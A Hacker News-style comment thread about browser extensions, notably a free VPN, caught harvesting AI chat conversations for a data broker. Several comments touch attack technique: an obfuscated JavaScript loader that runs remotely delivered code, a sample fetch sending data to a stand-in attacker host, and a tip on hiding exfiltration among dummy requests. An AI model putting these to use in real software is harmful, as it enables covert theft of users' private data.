> Firefox is committed to helping protect you against third-party software that may inadvertently compromise your data – or worse – breach your privacy with malicious intent. Before an extension receives Recommended status, it undergoes rigorous technical review by staff security experts.
https://support.mozilla.org/en-US/kb/recommended-extensions-...
I know that Google hates to pay human beings, but this is an area that needs human eyes on code, not just automated scans.
If you're feeling extra paranoid, the XPI file can be unpacked (it's just a ZIP) so you can check over the code for anything suspicious or unreasonably complex, particularly if the extension is supposed to be something simple like "move the up/down vote arrows further apart on HN". :P
While that doesn't solve the overall ecosystem issue, every little bit helps. You'll know it's time to run away if extensions become closed-source blobs.
Often they're compiled from TypeScript etc., making manual review almost impossible.
And if you demand the developer send in the raw uncompiled source, Google/Mozilla then has to figure out how to build an arbitrary project, which could use custom compilers or compilation steps.
Remember that someone malicious won't hide their malicious code in main.ts... it's gonna be deep inside a chain of libraries (which they might control too, or might have vendored).
In JS it can be much harder to find anything suspicious when the code is minified.
But back to Firefox: My house, my rules. So let external developers set some more strict rules that discourage the bad actors a little.
When a survey was conducted on the misuse of finances and power, it found that managers who did not sign the code (because they had to study it first and then "forgot" to) were more likely to cheat than those who actually signed the documents.
I=c=>c.map?c[0]?c.reduce((a,b)=>a[b=I(b)]||a(b),self):c[1]:c
(How it works is an exercise for the reader)
The actual code to run can be delivered as an innocuous looking JavaScript array from some server, and potentially only delivered to one high value target.
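For the curious, here is a de-obfuscated sketch of that one-liner (one assumption: `self` is the global object, as in a browser; `globalThis` is used below so it also runs under Node):

```javascript
// De-obfuscated version of the one-liner: arrays are "instructions".
const I = c => c.map                // only arrays have .map here
  ? (c[0]
      // non-empty head: walk/call a property chain from the global object
      ? c.reduce((a, b) => a[b = I(b)] || a(b), globalThis)
      : c[1])                       // [falsy, x] is the literal value x
  : c;                              // anything else evaluates to itself

// A "program" is plain JSON a server could deliver: this one resolves
// globalThis.Math.sqrt and calls it with the literal 16.
const result = I(["Math", "sqrt", [0, 16]]);
console.log(result); // 4
```

The payload looks like an innocuous nested array in transit, yet it can reach and invoke any global API.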
> Before an extension receives Recommended status, it undergoes rigorous technical review by staff security experts.
https://support.mozilla.org/en-US/kb/recommended-extensions-...
This is what the Firefox add-ons team sent to me when one of my extensions was invited to the Recommended program:
> If you’re interested in Control Panel for Twitter becoming a Firefox Recommended Extension there are a couple of conditions to consider:
> 1) Mozilla staff security experts manually review every new submission of all Recommended extensions; this ensures all Recommended extensions remain compliant with AMO’s privacy and security standards. Due to this rigorous monitoring you can expect slightly longer review wait times for new version submissions (up to two weeks in some cases, though it’s usually just a few days).
> 2) Developers agree to actively maintain their Recommended extension (i.e. make timely bug fixes and/or generally tend to its ongoing maintenance). Basically we don't want to include abandoned or otherwise decaying content, so if the day arrives you intend to no longer maintain Control Panel for Twitter, we simply ask you to communicate that to us so we can plan for its removal from the program.
What I saw in the Mozilla extension store was everything from minified code (why? it might have been useful on the web in the late '90s, but it's surely not necessary in an extension, which doesn't download its code from anywhere) to full-on data-stealing code (reported, and Mozilla removed it after two weeks or so).
I don't trust the review process one bit if they allow minified code in the store. For the same reason, "manual" review doesn't give me any extra confidence. I can look at minified code manually myself, but it's just gibberish, and suspicious code is much harder to discern.
Also, I just stopped using third-party extensions, except for two (Violentmonkey, uBlock Origin), so I no longer do reviews. I had a script that would extract the XPI into a git repository before each update, make a commit and show me a diff.
Friendly extension store for security conscious users would make it easy to review source code of the extension before hitting install or update. This is like the most security sensitive code that exists in the browser.
I think we need both human review and for somebody to create an antivirus engine for code that's on par with the heuristics of good AV programs.
You could probably do even better than that since you could actually execute the code, whole or piecewise, with debugging, tracing, coverage testing, fuzzing and so on.
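As a toy illustration of that dynamic-analysis idea, you could run the extension's code in a harness where network primitives are stubbed, then inspect which hosts it tried to contact (a sketch under heavy assumptions: real extensions also use XHR, WebSockets, beacons, and DNS tricks, and need a proper sandbox, not a monkey-patched global):

```javascript
// Record every host the code under test tries to fetch, without letting
// any traffic actually leave the machine.
const contacted = [];
globalThis.fetch = (url) => {
  contacted.push(new URL(url).hostname);     // log the destination
  return Promise.resolve(new Response(""));  // stub response (Node 18+)
};

// Pretend this line came from the extension under analysis:
fetch("https://telemetry.evil-example.com/collect?data=...");

console.log(contacted); // includes "telemetry.evil-example.com"
```

Comparing the contacted hosts against the extension's stated purpose is exactly the kind of check that scales better than eyeballing minified source.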
> Urban Cyber Security INC
https://opencorporates.com/companies/us_de/5136044
https://www.urbancybersec.com/about-us/
I found two addresses:
> 1007 North Orange Street 4th floor Wilmington, DE 19801 US
> 510 5th Ave 3rd floor New York, NY 10036 United States
and even a phone number: +1 917-690-8380
https://www.manhattan-nyc.com/businesses/urban-cyber-securit...
They look really legitimate on the outside, to the point that there's a fair chance they're not aware what their extension is doing. Possibly they're "victim" of this as well.
If that looks *really legitimate* to you, then you might be easily scammed. I'm not saying they're not legitimate, but nothing that you shared is a strong signal of legitimacy.
It would take perhaps a few hundred dollars a month to maintain a business that looked exactly like this, and maybe a couple thousand to buy one that somebody else had aged ahead of time. You wouldn't have to have any actual operations. Just continuously filed corporate papers, a simple brochure website, and a couple of virtual office accounts in places so dense that people don't know the virtual address sites by heart.
Old advice, but be careful believing what you encounter on the internet!
> Old advice, but be careful believing what you encounter on the internet!
Try to not be terminally cringe either?
And also, why an extension for a VPN? I live in a country where almost everybody uses a VPN just to watch YouTube and read Twitter, and none of my friends use strange extensions. There is open-source software for that, from real VPNs like WireGuard to proxy software like nekoray/v2raytun. A browser extension is the last thing I would install to be private.
What, there's an issue because I'm not being underhanded about it like that swatcoder guy?
> And also, why extension for vpn?
Why are you asking me that?
> What, there's an issue because I'm not being underhanded about it like [that] guy?
Wow you’ve put something into words here I never consciously realized is an unwritten rule. Sounds silly but yea you’re 100% right; that seems to be exactly the game we play.
For better or for worse.
HN guidelines: Assume good faith.
Based on what? The same instinct that told you having an address and phone number makes an entity legitimate? The chance the people behind this company live in the US is incredibly low. And even if they do live in the US what exactly would they be getting charged with and who would care enough to charge them?
The NY address is a virtual office.
https://themillspace.com/wilmington/
The DE address is a virtual office plus coworking facility.
You run a business from home but do not want to reveal your personal address to the world.
Or you are from a country that Stripe doesn't support but need to use their unique capabilities like Stripe Connect; you might then sign up for Stripe Atlas to incorporate in the USA so you can do business directly with Stripe. Your US business then needs a US physical address, i.e. a virtual office.
Etc
> This company has been on researchers' radar before. Security researchers Wladimir Palant and John Tuckner at Secure Annex have previously documented BiScience's data collection practices. Their research established that:
> - BiScience collects clickstream data (browsing history) from millions of users
> - Data is tied to persistent device identifiers, enabling re-identification
> - The company provides an SDK to third-party extension developers to collect and sell user data
> BiScience sells this data through products like AdClarity and Clickstream OS
> The identical AI harvesting functionality appears in seven other extensions from the same publisher, across both Chrome and Edge:
Hmm.
> They look really legitimate on the outside
Hmm, what, no.
We have a data collection company, thriving financially on the lack of privacy protections and the indiscriminate collection and collation of data, connected to eight data-siphoning "Violate Privacy Network" apps.
And those apps are free... Which is seriously default sketchy if you can't otherwise identify some obviously noble incentives to offer free services/candy to strangers.
Once is happenstance, twice is coincidence, three (or eight) times is enemy action.
The only thing that could possibly make this look any worse is discovering a connection to Facebook.
1000 N. WEST ST. STE. 1501, WILMINGTON, New Castle, DE, 19801
It almost matches this law firm's address, but not quite.
https://www.skjlaw.com/contact-us/
Brandywine Building 1000 N. West Street, Suite 1501 Wilmington DE 19801
BiScience is an Israeli company.
Sometimes things don't make sense to me, like how "Uber Driver app access background location and there is no way to change that from settings" - https://developer.apple.com/forums/thread/783227
Or they'd tell WhatsApp to allow granting microphone permissions for one single call, instead of requesting permanent microphone permissions. All apps that I know of respect the flow of "Ask every time", all but Meta's app.
Google just doesn't care.
Or even better, mix in some real names and phone numbers but change all the other details. I want data brokers to think I live in 8 different countries. I want my email address to show up for 50 different identities. Good luck sorting that out.
The developer documentation is actually pretty clear about this: https://developer.apple.com/documentation/bundleresources/ch...
What we actually need is runtime permissions that fire when the extension tries to do something suspicious - like exfiltrating data to domains that aren't related to its stated function. iOS does this reasonably well for apps. Extensions should too.
The "Recommended" badge helps but it's a bandaid. If an extension needs "read and change all data on all websites" to work, maybe it shouldn't work.
For example there's no need for the "inject custom JS or CSS into websites" extensions to need permission to read and write data on every single website you visit. If you only want to use them to make a few specific sites more accessible to you that doesn't mean you're okay with them touching your online banking. Especially when most of these already let you define specific URLs or patterns each rule/script should apply to.
I understand that there are still vectors for data exfiltration when the same extension has permissions on two different sites and that "code injection as a service" is inherently risky (although cross-origin policies can already lock this down somewhat) but in 2025 I'd hope we could have a more granular permission model for browser extensions that actually supports sandboxing.
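A toy sketch of that per-site scoping: only run an injected script when the page URL matches a pattern the user opted into (my own simplified matcher, not Chrome's or Firefox's actual match-pattern logic, which handles many more edge cases):

```javascript
// Only act on pages whose URL matches a pattern the user explicitly allowed.
function matchesPattern(pattern, url) {
  const regex = pattern
    .replace(/[.+?^${}()|[\]\\]/g, "\\$&")  // escape regex metacharacters
    .replace(/\*/g, ".*");                   // '*' is the only wildcard
  return new RegExp(`^${regex}$`).test(url);
}

const allowed = ["https://*.example.com/*"];  // user's opt-in list
const shouldInject = url => allowed.some(p => matchesPattern(p, url));

shouldInject("https://news.example.com/page"); // true
shouldInject("https://bank.com/login");        // false: no broad permission
```

The point is that the browser, not the extension, should enforce this list, so "read and change all data on all websites" stops being the default ask.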
Is this where we’re at with AI?
Putting a token predictor in the mix — especially one incapable of any actual understanding — seems like a natural evolution.
Absolved of burden of navigating our noisy, incomplete and dissonant thoughts, we can surrender ourselves to the oracle and just obey.
For example HBR recently reported the number 1 use for ChatGPT is "Therapy/companionship"
"Let us handle all your internet traffic.. you can trust us.. we're free!"
No thank you.
Meanwhile, reputable VPN providers like Mullvad offer their service without KYC and leave the feds empty-handed when they knock on their doors.
https://mullvad.net/en/blog/mullvad-vpn-was-subject-to-a-sea...
That's why TLS exists, after all. All Internet traffic is wiretapped.
> That's why TLS exists, after all.
That protects you if you're using standard methods to connect. Installed software gets to bypass it.
Maybe some
But it's cumbersome.
> "Let us handle all your internet traffic.. you can trust us.. []"
TLS does not help when most Internet traffic is passed through a single entity which by default terminates TLS with an edge certificate and re-encrypts all data passing through, so it has plaintext visibility into everything transmitted.
but other than that I would never trust anything other than Mullvad/IVPN/ProtonVPN
VPNs are just one example. How many chrome extensions do you have that you don't use all the time, like adblockers, cookie consent form handlers or dark mode?
But considering those are browser extensions, I think they can just inspect any traffic they want on the client side (if they can get such broad permissions approved, which is probably not too hard).
[1] https://secureannex.com/blog/cyberhaven-extension-compromise.... [2] https://secureannex.com/blog/sclpfybn-moneitization-scheme/ (referenced in the article)
The scary part is these extensions had Google's "Featured" badge. Manual review clearly isn't enough when companies can update code post-approval. We need continuous monitoring, not just one-time vetting.
For anyone building privacy-focused tools: making your data collection transparent and your business model clear upfront is the only way to build trust. Users are getting savvier about this.
There has to be a better system. Maybe a public extension safety directory?
Additionally, Brave, a Chromium-based browser, has ad blocking built into the browser itself, meaning it is not affected by WebExtension changes and does not require trusting an additional third party.
I do think security researchers would be able to figure out what scripts are downloaded and run.
Regardless, none of this seems to matter to end users whether the script is in the extension or external.
If so, I feel like something that limited is hardly even a browser extension interface in the traditional sense.
So you can still do everything you could before, but it’s not as hidden anymore
In much of the physical world thankfully there's laws and pretty-effective enforcement against people clubbing you on the head and taking your stuff, retail stores selling fake products and empty boxes, etc.
But the tech world is this ever-boiling global cauldron of intangible software processes and code - hard to get a handle on what to even regulate. Wish people would just be decent to each other, and that that would be culturally valued over materialism and moneymaking by any possible means. Perhaps it'll make a comeback.
I spend a lot of time trying to think of concrete ways to improve the situation, and would love to hear people's ideas. Instinctively I tend to agree it largely comes down to treating your users like human beings.
Get as off-grid as you possibly can. Try to make your everyday use of technology as deterministic as possible. The free market punishes anyone who “respects their users”. Your best bet is some type of tech co-op funded partially by a billionaire who decided to be nice one day.
Part of the problem has been that there's a mountain to climb vis a vis that extra ten miles to take something that 'works for me' and turn it into 'gramps can install this and it doesn't trigger his alopecia'.
Rather, that was the problem. If you're looking for a use case for LLMs, look no further. We do actually have the capacity to build user-friendly stuff at a fraction of the time cost that we used to.
We can make the world a better place if we actually give a shit. Make things out in the open, for free, that benefit people who aren't in tech. Chip away at the monopolies by offering a competitive service because it's the right thing to do and history will vindicate you instead of trying to squeeze a buck out of each and every thing.
I'm not saying "don't do a thing for money". You need to do that. We all need to do that. But instead of your next binge watch or fiftieth foray into Zandronum on brutal difficulty, maybe badger your llm to do all the UX/UI tweaks you could never be assed to do for that app you made that one time, so real people can use it. I'm dead certain that there are folks reading this now who have VPN or privacy solutions they've cooked up that don't steal all your data and aren't going to cost you an arm and a leg. At the very least, someone reading this has a network plugin that can sniff for exfiltrated data to known compromised networks (including data brokers) - it's probably just finicky to install, highly technical, and delicate outside of your machine. Tell claude to package that shit so larry luddite can install it and reap the benefits without learning what a bash is or how to emacs.
The island states have been dethroned.
Brave New World was apathy: the system was comfortable, Soma was freely available, and there was a whole apparatus to give disruptive elements comfortable but non-disruptive engagement.
The protagonist in Brave New World spends a lot of time resenting the system but really he just resents his deformity, wanted what it denied him in society, and had no real higher criticisms of it beyond what he felt he couldn't have.
You might even imagine 1984's society evolving into Brave New World's as the mechanisms of oppression are gradually refined. Indeed, Aldous Huxley himself suggested as much in a letter to Orwell [1].
[1] https://gizmodo.com/read-aldous-huxleys-review-of-1984-he-se...
Bonus points if the government agency can leave most of the work to an ostensibly separate private company, while maintaining a "mutual understanding" of government favors for access.
Articles like this do a decent job of bringing awareness, but we all know Google will do absolutely nothing
Sometimes knowing tech makes us think we're somehow better and can bypass high level wisdom.
> We asked Wings, our agentic-AI risk engine, to scan for browser extensions with the capability to read and exfiltrate conversations from AI chat platforms.
A review page [2] mentions that this add-on is a peer-to-peer VPN; not having its own dedicated servers already makes it suspicious.
[1] https://web.archive.org/web/20250126133131/https://addons.mo...
Or that the review happened before the code harvested all the LLM conversations and never got reviewed after it was updated.
Think: is my brand getting mentioned more in AI chats? Are people associating positive or negative feelings towards it? Are more people asking about this topic lately?
Could one just feed the extension and a good prompt to claude to do this? Seems like automation CAN sniff this kind of stuff out pretty easily.
With those extensions the user's data and internet are the product, most if not all are also selling residential IP access for scrapers, bots, etc.
Good thing Google is protecting users by taking down such harmful extensions as ublock origin instead.
They take a 5.5% fee whenever you buy credits. There's also a discount for opting-in to share your prompts for training.
That can be circumvented by bundling the conversations into one POST to an API endpoint, along with a few hundred calls to several dummy endpoints to muddy the waters. Bonus points if you can make it look like a normal update script.
It'll still show up in the end, but at this point your main goal is to delay the discovery as much as you can.
Or you mean the web sites packed with a copy of chromium?
How is it possible to have extensions this egregiously malicious in the new system?
> The thought didn't let go. As a security researcher, I have the tools to answer that question.
What huh, no you don't! As a security researcher you should know better!
No. When you want to increase your security, you install fewer tools.
Each tool increases your exposure. Why is the security industry full of people who don't get this?
If you really are a security researcher then that's not true. You already know all this.
Trusting Google with your privacy is like putting the fox in charge of the henhouse.
(for firefox/derivatives anyways...)
70 thousand users on what I would actually call "privacy" extensions.
Bit of a misleading title then.
“I know, let’s have an AI do all the work for us instead. Let’s take a coffee break.”
If you are not paying for the product, you are the product.
And um, a boy and a girl.
...
Anyway, the thing was that one day they started acting kinda funny. Kinda, weird.
They started being seen exchanging tokens of affection.
And it was rumoured they were engaging in...
If Urban VPN is indeed closely affiliated with the data broker, a GDPR fine might also affect that company too given how these fines work. There is a high bar for the kind of misconduct that would result in a fine but it seems plausible that they're being knowingly and deliberately deceptive and engaging in widespread data collection that is intentionally invasive and covert. That would be a textbook example for the kind of behavior the GDPR is meant to target with fines.
The same likely applies to the other extensions mentioned in the article. Yes, "if the product is free, you are the product" but that is exactly why the GDPR exists. The problem isn't that they're harvesting user data but that they're being intentionally deceptive and misleading in their statements about this, claim they are using consent as the legal basis without having obtained it[0], and they're explicitly contradicting themselves in their claims ("we're not collecting sensitive information that would need special consideration but if we do we make sure to find it and remove it before sharing your information but don't worry because it's mostly used in aggregate except when it isn't"). Just because you expect some bruising when picking up martial arts as a hobby doesn't mean your sparring partner gets to pummel your face in when you're already knocked out.
[0]: Because "consent" seems to be a hard concept for some people to grasp: it's literally analogous to what you'd want to establish before having sex with someone (though to be fair: the laws are much more lenient about unclear consent for sex because it's less reasonable to expect it to be documented with a paper trail like you can easily do for software). I'll try to keep it SFW but my place of work is not your place of work so think carefully if you want to copy this into your next Powerpoint presentation.
Does your prospective sexual partner have any reason to strongly believe that they can't refuse your advances because doing so would limit their access to something else (e.g. you took them on a date in your car and they can't afford a taxi/uber and public transport isn't available so they rely on you to get back home, aka "the implication")? Then they can't give you voluntary consent because you're (intentionally or not) pressuring them into it. The same goes if you make it much harder for them to refuse than to agree (I can't think of a sex analogy for this because this seems obvious in direct human interactions but somehow some people still think hiding "reject all non-essential" is an option you are allowed to hide between two more steps when the "accept all" button is right there even if the law explicitly prohibits these shenanigans).
Is your prospective sexual partner underage or do they appear extremely naive (e.g. you suspect they've never had any sex ed and don't know what having sex might entail or the risks involved like pregnancy, STIs or, depending on the acts, potential injuries)? Then they probably can't give you informed consent because they don't fully understand what they're consenting to. For data processing this would be failure to disclose the nature of the collection/processing/storage that's about to happen. And no, throwing the entire 100 page privacy policy at them with a consent dialog at the start hardly counts the same way throwing a biology textbook at a minor doesn't make them able to consent.
Is your prospective sexual partner giving you mixed signals but seems to be generally okay with the idea of "taking things further"? Then you're still missing specific consent and better take things one step at a time checking in on them if they're still comfortable with the direction you're taking things before you decide to raw dog their butt (even if they might turn out to be into that). Or in software terms, it's probably better to limit the things you seek consent for to what's currently happening for the user (e.g. a checkbox on a contact form that informs them what you actually intend to do with that data specifically) rather than try to get it all in one big consent modal at the start - this also comes with the advantage that you can directly demonstrate when and how the specific consent relevant to that data was obtained when later having to justify how that data was used in case something goes wrong.
Is your now-active sexual partner in a position where they can no longer tell you to stop (e.g. because they're tied up and ball-gagged)? Then the consent you did obtain isn't revokable (and thus again invalid) because they need to be able to opt out (this is what "safe words" are for and why your dentist tells you to raise your hand where they can see it if you need them to stop during a procedure - given that it's hard to talk with someone's hands in your mouth). In software this means withdrawing consent (or "opting out") should be as easy as it was to give it in the first place - an easy solution is having a "privacy settings" screen easily accessible in the same place as the privacy policy and other mandatory information that at the very least covers everything you stuffed in that consent dialog I told you not to use, as well as anything you tucked away in other forms downstream. This also gives you a nice place to link to at every opportunity to keep your user at ease and relaxed to make the journey more enjoyable for both of you.
(Yes it really is AI-written / AI-assisted. If your AI detectors don’t go off when you read it you need to be retrained.)
There are honest ways to make a living. In this case honest is “being transparent” about the way data is handled instead of using newspeak.